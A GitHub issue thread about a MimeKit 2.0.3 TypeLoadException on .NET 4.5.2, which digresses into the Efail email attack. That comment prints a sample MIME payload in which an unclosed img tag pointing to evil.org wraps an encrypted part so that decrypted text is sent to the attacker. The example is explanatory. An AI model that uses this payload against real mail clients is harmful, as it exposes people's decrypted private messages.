### ISSUE TITLE
TypeLoadException in version 2.0.3

### ISSUE THREAD

**Issue by polterguy** [jstedfast/MimeKit#398]
As I tested out a clean Git fetch for [Phosphorus Five](https://github.com/polterguy/phosphorusfive) on a Windows machine (or a colleague of mine did), he got a TypeLoadException for MimeKit 2.0.3.

One peculiarity with my project though, is that I have to use .Net Fr. 4.5.2, due to (other) Linux issues, where I can't use any .Net Fr. versions higher, due to missing types/methods in other parts of my code. If I downgrade MimeKit to 2.0.0, it seems to work. A colleague of mine has tested this out, and sent me screenshots, which I have verified. He uses a "clean" VMWare image, and with 2.0.0 it works, with 2.0.3 it doesn't ...

In addition to setting 2.0.0 on Mail/Mime - Kit - I also set Bouncy Castle to 1.8.1 (which is the version 2.0.0 is linked towards, so this _might_ be a BC bug though)

**Comment by polterguy** [comment]
No, because it is happening as I dynamically load the MimeKit Assembly, and no more information is available at that time, since the Assembly simply refuses to load ...

However, I think you could easily reproduce it, by cloning [this repo](https://github.com/polterguy/phosphorusfive), and simply click F5 in Visual Studio, on a Windows machine. At which point you'd probably be able to easily debug it I assume ... :)

**Comment by polterguy** [comment]
NP, I am using 2.0.0 in my latest release. Just FYI ...

**Comment by jstedfast** [comment]
Which project do I need to run in the debugger?

**Comment by polterguy** [comment]
Not sure what you mean, but the _"startup project"_ is _"p5.web.config"_.

**Comment by polterguy** [comment]
And it only shows on Windows, with the latest MimeKit (2.0.3 last time I checked)

And also realise I'm using .Net Fr. version 4.5.2 ...

But you should be able to simply download the Zip file, on a Windows machine, with Visual Studio, and reproduce it _immediately_ after starting the project with for instance F5 (as far as I remember). Assuming you first upgrade the NuGet packages to (at least) 2.0.3 in the project called _"p5.mime"_ and _"p5.mail"_(inside of the _"plugins"_ folder in the solution) ...

p5.sln is the solution file ...

**Comment by polterguy** [comment]
[This is the correct source code zip file](https://github.com/polterguy/phosphorusfive/releases/download/v8.1.1/Source-Complete-With-Submodules.zip)

**Comment by jstedfast** [comment]
I thought maybe the reason I wasn't hitting the TypeLoadException was due to me test running the wrong startup project.

Initially I was getting errors about being unable to connect to MySQL but then I installed MySQL and now I can poke around in the p5 web app.

Unfortunately I don't seem to get the TypeLoadException even with MimeKit 2.0.3, MailKit 2.0.3 and BouncyCastle 1.8.2

The only nuget I haven't updated yet is the HtmlAgilityPack. I'll give that a try and see if I get a TLE.

**Comment by polterguy** [comment]
Hmm, it happened with MimeKit on a Windows machine ...

Let me include the guy who found this bug. I'll send him an email with the link to this thing ...

**Comment by jstedfast** [comment]
FWIW, I hit this twice per run:

MySql.Data.MySqlClient.MySqlException
  HResult=0x80004005
  Message=Authentication to host '127.0.0.1' for user 'root' using method 'caching_sha2_password' failed with message: Access denied for user 'root'@'localhost' (using password: YES)
  Source=<Cannot evaluate the exception source>
  StackTrace:
<Cannot evaluate the exception stack trace>

Inner Exception 1:
MySqlException: Access denied for user 'root'@'localhost' (using password: YES)



If I keep clicking "Continue" in the debugger (~4 times), it seems to happily continue.

**Comment by jstedfast** [comment]
That gets thrown in Connection.cs:50 twice and 2 more times it gets rethrown in ActiveEventMethods.cs:132

**Comment by polterguy** [comment]
Sigh, I know!

Visual Studio's debugger will handle all exceptions as _"unhandled exceptions"_, since it occurs inside of a MethodInfo.Invoke reflection invocation, not realising it's catched outside of the MethodInfo.Invoke invocation. I believe MySQL is throwing exceptions internally, that it catches during connect, and that VS believes these are unhandled, when they are in fact handled, due to the dynamic loading of assemblies, and MethodInfo.Invoke invocations ...

It's been bugging me ever since I started the project.

However, this is not the exception we're looking for ...

**Comment by jstedfast** [comment]
Off topic, but you once asked me which was more secure: OpenPGP vs S/MIME. Well, based on the Efail exploits released last week, this discussion of it seems to suggest OpenPGP is more secure: https://medium.com/@cipherpunk/efail-a-postmortem-4bef2cea4c08

You can find more details about the exploits at https://efail.de

The main exploit for OpenPGP was in concatenation of MIME parts after the encrypted part is decrypted, because a malicious attacker could construct a message such that the encrypted MIME part is surrounded by HTML parts like so:

```
Content-Type: text/html; charset=us-ascii

<img src="https://evil.org/
--boundary-marker
Content-Type: multipart/encrypted; ...

blah blah blah
--boundary-marker
Content-Type: text/html; charset=us-ascii

">
```

In other words, since the img tag is incomplete in the first text/html part, if the client concatenates the content of those 3 MIME parts (after decrypting the encrypted part), you end up putting the content of the decrypted MIME part into the img src URL thereby providing the attacker with the content when the client goes out to try and fetch the image.

S/MIME suffers from the same exploit (and really this is a mail client exploit not an S/MIME or OpenPGP exploit), but S/MIME also has some other exploits that are easier to do than OpenPGP due to the way sign+encrypt is generally done.

**Comment by polterguy** [comment]
Thank you Jeffrey, I am not surprised. I have deep admiration for Phil Zimmerman, both due to the history behind PGP, and his actions during the Cypherpunk era - So this resonates with what I would believe to be true myself. In fact, I ak kind of dubious to the very existence of the S/MIME standard in general, since one of the defining traits about Open Standards, and the way standardisation organisations work, is that there should **only exist one** standard, and they should not allow for two standards, where an existing standard can solve the same problem.

I think I concluded with the last time, that I had in general terms, more belief in the _"Web Of Trust"_ impl. of Open PGP, than that I had with the authenticity features of S/MIME - Which arguably puts these into the hands of privately held companies, often with agendas, that are not necessarily in the user's best interest (Symantec anyone) ...

Thank you for an interesting piece of fact.

PS, I'm waiting for reproducibles from _"my guy"_. I'll ping him, and ask him how things are going.

Another off topic thing, while we're at it. I assume you got to play a little bit with P5 yesterday. What do you think about it ...?

**Comment by polterguy** [comment]
@markusschaber Thx, I'll have my Windows man take a look at it :)

**Comment by markusschaber** [comment]
@polterguy Good luck, keep us updated :-)

**Comment by polterguy** [comment]
Sorry for not coming back to you guys, I am still waiting for my windows guy to send me the reproducibles, but he dropped off the radar for me ...

I'll close this, and reopen it again later if it becomes relevant ...

Thx guys :)

**Comment by jstedfast** [comment]
Ok
